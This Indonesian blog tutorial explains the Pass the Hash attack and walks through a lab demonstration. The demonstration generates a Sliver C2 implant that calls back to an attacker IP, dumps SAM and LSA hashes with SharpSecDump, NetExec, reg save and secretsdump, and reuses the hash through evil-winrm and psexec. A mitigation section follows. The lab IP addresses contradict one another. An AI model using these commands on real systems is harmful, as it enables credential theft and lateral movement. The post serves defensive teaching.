Pash the Hash: Breach Without a Wor

alwannn 4K
8 min read5 days ago

--

Pendahuluan

Di dunia keamanan siber yang terus berkembang, memahami teknik penyerang menjadi kunci untuk memperkuat pertahanan. Salah satu metode yang sering digunakan oleh penyerang adalah Pass the Hash (PtH) — teknik licin yang memungkinkan penyerang masuk ke sistem tanpa perlu mengetahui kata sandi asli. Dengan memanfaatkan hash kredensial yang dicuri, PtH menjadi senjata favorit untuk berpindah antar sistem dalam jaringan secara senyap. Artikel ini akan mengupas cara kerja serangan ini, dan membuang hash secara remote dan dump hash secara manual.

Apa Itu Pass the Hash?

Pass the Hash adalah teknik peretasan di mana penyerang menggunakan hash kredensial — seperti NTLM hash — yang telah dicuri untuk mendapatkan akses ke sistem atau jaringan lain tanpa perlu memecahkan kata sandi asli. Bayangkan Anda menemukan kunci duplikat rumah seseorang: Anda tidak perlu tahu bentuk kunci aslinya, asalkan kunci itu bisa membuka pintu. Dalam PtH, hash adalah “kunci duplikat” yang memungkinkan penyerang berpura-pura sebagai pengguna sah. Teknik ini sangat efektif di lingkungan Windows karena banyak sistem masih mengandalkan protokol autentikasi NTLM yang rentan.

Bagaimana Caranya Bekerja?

Mencuri Hash Kredensial

  • Penyerang pertama-tama harus mendapatkan hash dari sistem yang sudah diretas. Ini bisa dilakukan dengan:
  • Mengekstrak hash dari memori komputer (misalnya menggunakan alat seperti Mimikatz) setelah mendapatkan akses awal (contoh: melalui phishing atau malware).
  • Mengambil hash dari file sistem seperti SAM (Security Accounts Manager) di Windows.
  • Hash yang dicuri biasanya berupa NTLM hash, yang merupakan representasi terenkripsi dari kata sandi.

Menggunakan Hash untuk Autentikasi

  • Setelah hash didapatkan, penyerang tidak perlu mendekripsi atau mengetahui kata sandi asli. Mereka langsung menggunakan hash tersebut untuk “berpura-pura” sebagai pengguna sah.
  • Dalam jaringan Windows, hash ini bisa digunakan untuk mengakses layanan seperti SMB (file sharing), Remote Desktop, atau sistem lain yang menerima autentikasi berbasis NTLM.

Meneruskan Akses ke Sistem Lain

  • Dengan hash tersebut, penyerang bisa berpindah (lateral movement) ke komputer atau server lain dalam jaringan yang mempercayai kredensial tersebut.
  • Misalnya, jika hash milik akun admin domain, penyerang bisa menguasai seluruh jaringan.

Tetap Tersembunyi

  • Karena tidak ada kata sandi yang diubah atau diciptakan, serangan ini sulit dideteksi oleh sistem keamanan tradisional. Aktivitasnya terlihat seperti login biasa.

Bayangkan kamu punya kunci duplikat rumah seseorang. Kamu tidak perlu tahu bentuk asli kunci utamanya; yang penting kunci duplikat itu bisa membuka pintu. Dalam Pass the Hash, hash adalah “kunci duplikat” yang membuka akses tanpa perlu kata sandi asli.

Mulai Demonstrasi

Target IP: 192.168.8.178
Attacker IP: 192.168.8.178

Baik, langkah selanjutnya adalah mengekstrak hash dari mesin lokal target. Dalam demonstrasi ini, saya akan menggunakan Sliver sebagai framework C2 (Command and Control) karena memiliki gudang senjata yang sangat hebat dan keren. Saya akan mendemonstrasikan beberapa teknik untuk mengambil (dumping) hash baik dari mesin lokal maupun remote.

Tahap awal, kita membutuhkan koneksi ke target. Berikut adalah langkah-langkahnya :

Menyiapkan Sliver C2

  • Pastikan Sliver sudah terpasang di mesin attacker (IP: 192.168.8.179). Unduh dari GitHub, lalu jalankan server dengan perintah:
./sliver-server
  • Verifikasi server aktif dengan pesan seperti [server] sliver server started.
  • Membuat Payload untuk Target
  • Di terminal Sliver, buat payload untuk Windows (asumsi target adalah Windows) dengan perintah:
  • generate --mtls 192.168.8.179 --os windows --arch amd64 -o payload.exe
  • Ini akan menghasilkan file payload.exe yang akan kita kirim ke target. Payload ini akan terhubung kembali ke server Sliver di IP attacker.
  • Mengirim dan Menjalankan Payload di Target
  • Transfer payload.exe ke mesin target (IP: 192.168.8.178), misalnya via USB, email phishing, atau metode lain.
  • Jalankan file di target dengan mengkliknya atau via command prompt:
  • Kembali ke terminal Sliver attacker, ketik sessions untuk memastikan target terkoneksi. Anda akan melihat sesi aktif seperti:

seperti yang terlihat di gambar kita sudah memiliki koneksi ke target. selanjutnya kita mulai luncurkan serangan.

Mengekstrak Hash

Setelah koneksi ke target (IP: 192.168.8.240) berhasil dibuat melalui Sliver C2, langkah berikutnya adalah mencoba mengekstrak (dumping) hash dari mesin target. Awalnya, saya mencoba menggunakan utilitas bawaan Sliver, yaitu hashdump, dengan perintah berikut

hashdump

Namun, hasilnya menunjukkan pesan error: “Access Denied”. Izin ditolak! Sepertinya proses ini terhalang oleh keamanan lsass.exe (Local Security Authority Subsystem Service), yang dilindungi oleh sistem operasi Windows untuk mencegah akses tanpa hak yang memadai.

Untuk mengatasi ini, saya beralih ke fitur Armory di Sliver — sebuah koleksi alat tambahan yang bisa diunduh langsung dari framework. Saya memilih SharpSecDump, sebuah alat yang dirancang untuk mengekstrak hash secara remote. Langkah-langkahnya adalah sebagai berikut:

Unduh SharpSecDump via Armory dengan perintah:

armory install sharpsecdump // jika sudah lanjut jalankan di bawah ini
[server] sliver (LONG_SOW) > sharpsecdump '' -target=127.0.0.1

dan boom kita berhasil mendapatakanya :))

Mengekstrak Hash dengan NetExec (nxc)

Baik, sekarang jika kita tidak ingin mengekstrak hash melalui Sliver, ada opsi lain yang bisa digunakan, yaitu NetExec (disingkat nxc) — sebuah alat jaringan yang kuat untuk pengujian keamanan. Untuk berhasil mengekstrak hash menggunakan nxc, pastikan Anda memiliki kredensial yang valid, karena proses ini membutuhkan hak akses administrator.

Sebagai catatan, Pass the Hash pada dasarnya adalah teknik persistence di lingkungan Windows, yang memungkinkan penyerang mempertahankan akses ke mesin target dengan memanfaatkan hash kredensial yang sudah dicuri. Berikut cara melakukannya dengan NetExec:

Pastikan NetExec Terpasang

  • Unduh dan instal NetExec di mesin attacker Anda (misalnya via pip install netexec atau dari repositori GitHub).

Gunakan Kredensial untuk Autentikasi

  • Jalankan perintah nxc dengan kredensial atau hash yang valid. Contoh jika Anda punya username dan password:
nxc smb 192.168.8.240 -u <user> -p <pass> --sam

dan boom kita dapat mengextrackya..

di sini kita juga bisa dump melalui lokal pertama jalankan perintah seperti di bawah.

reg save hklm\system system
reg save hklm\sam sam

jika sudah lagsung download sam dan system file ke mechine lokal

jika sudah di download, skrng download tools impacket yaitu secretdump.py lalu jalankan perintahnya untuk membuang hash

dan boom kita berhasil membuang hash melalui lokal.

skrng kita akan coba menggunakan hash ntlm ini untuk auth ke mechine windows di sini saya akan coba evil-wirnm

kita bisa masuk melalui evil-winrm tanpa credensial password plaintext dan hanya menggunakan hash :LM

di sini kita juga bisa remote melalui psexec.py

yap seperti itulah tehnik umum memanfaatkan pash the hash ada bnyak serangan yg keren di luar saya dengan hanya menggunakan hash seperti golden tikcet silver ticket.

Mitigasi Serangan Pass the Hash

Pass the Hash adalah teknik berbahaya yang memungkinkan penyerang menggunakan hash kredensial untuk mendapatkan akses tanpa kata sandi asli. Untuk melindungi diri dari serangan ini, berikut adalah langkah-langkah mitigasi yang bisa Anda terapkan:

1. Aktifkan Credential Guard

  • Apa Itu? Credential Guard adalah fitur keamanan di Windows (tersedia di edisi Enterprise) yang mengisolasi kredensial sensitif seperti NTLM hash di memori menggunakan teknologi virtualisasi (Virtual Secure Mode).
  • Cara Kerja: Ini mencegah alat seperti Mimikatz mengekstrak hash dari proses lsass.exe.
  • Langkah:
  • Pastikan perangkat mendukung TPM (Trusted Platform Module) atau UEFI.
  • Aktifkan via Group Policy: Computer Configuration > Administrative Templates > System > Credential Guard.
  • Restart sistem setelah konfigurasi.

2. Gunakan Autentikasi Kerberos, Bukan NTLM

  • Apa Itu? NTLM rentan terhadap Pass the Hash, sedangkan Kerberos lebih aman karena tidak mengandalkan hash yang bisa dicuri.
  • Cara Kerja: Kerberos menggunakan tiket autentikasi berbasis waktu, bukan hash statis.
  • Langkah:
  • Konfigurasi domain Anda untuk memprioritaskan Kerberos di Active Directory.
  • Nonaktifkan NTLM jika memungkinkan via Group Policy: Network Security: Restrict NTLM.
  • Pastikan semua aplikasi dan layanan mendukung Kerberos.

3. Batasi Penggunaan Akun dengan Hak Tinggi

  • Apa Itu? Akun administrator adalah target utama karena hash-nya bisa digunakan untuk menguasai jaringan.
  • Cara Kerja: Dengan membatasi hak admin, dampak serangan bisa diminimalkan.
  • Langkah:
  • Gunakan akun standar untuk aktivitas sehari-hari, bukan akun admin.
  • Terapkan Privileged Access Management (PAM) untuk mengelola akun admin.
  • Hapus hak admin lokal dari akun yang tidak perlu via lusrmgr.msc.

4. Terapkan Least Privilege Principle

  • Apa Itu? Hanya berikan hak akses sesuai kebutuhan pengguna atau proses.
  • Cara Kerja: Mengurangi jumlah hash bernilai tinggi yang tersedia di memori.
  • Langkah:
  • Audit izin pengguna di Active Directory dengan tools seperti BloodHound.
  • Batasi proses yang berjalan dengan hak tinggi (misalnya, nonaktifkan Run as Administrator yang tidak perlu).

5. Pantau dan Deteksi Aktivitas Mencurigakan

  • Apa Itu? Sistem pemantauan bisa mendeteksi pola lateral movement yang sering menyertai Pass the Hash.
  • Cara Kerja: Log autentikasi yang tidak wajar bisa menjadi indikator serangan.
  • Langkah:
  • Gunakan SIEM (Security Information and Event Management) seperti Splunk atau Microsoft Sentinel.
  • Aktifkan logging untuk Event ID 4624 (logon) dan 4672 (privilege assignment) di Windows Event Viewer.
  • Perhatikan login berulang dari IP atau mesin yang tidak biasa.

6. Perbarui Sistem dan Terapkan Patch

  • Apa Itu? Kerentanan di sistem operasi atau aplikasi bisa dimanfaatkan untuk mendapatkan hash awal.
  • Cara Kerja: Patch menutup celah yang memudahkan ekstraksi hash.
  • Langkah:
  • Pastikan Windows selalu diperbarui (contoh: KB4103727 untuk mitigasi tambahan).
  • Nonaktifkan fitur lama seperti SMBv1 yang rentan via Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol.

7. Gunakan Multi-Factor Authentication (MFA)

  • Apa Itu? MFA menambahkan lapisan keamanan di luar kredensial biasa.
  • Cara Kerja: Hash saja tidak cukup untuk autentikasi jika MFA aktif.
  • Langkah:
  • Aktifkan MFA di layanan seperti Azure AD atau aplikasi pihak ketiga (Duo, Google Authenticator).
  • Terapkan untuk semua akun sensitif, terutama admin.

Penutup

Dengan menerapkan mitigasi di atas, Anda bisa secara signifikan mengurangi risiko serangan Pass the Hash. Kombinasi perlindungan teknis (Credential Guard, Kerberos) dan praktik terbaik (least privilege, pemantauan) akan membuat sistem Anda lebih sulit ditembus. Ingat, pencegahan selalu lebih baik daripada menangani dampak setelah serangan terjadi!

trimasih telah membaca :))

Sign up to discover human stories that deepen your understanding of the world.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

--

--

alwannn 4K
alwannn 4K

Written by alwannn 4K

Tidak mempunyai latar belakang.

No responses yet

Write a response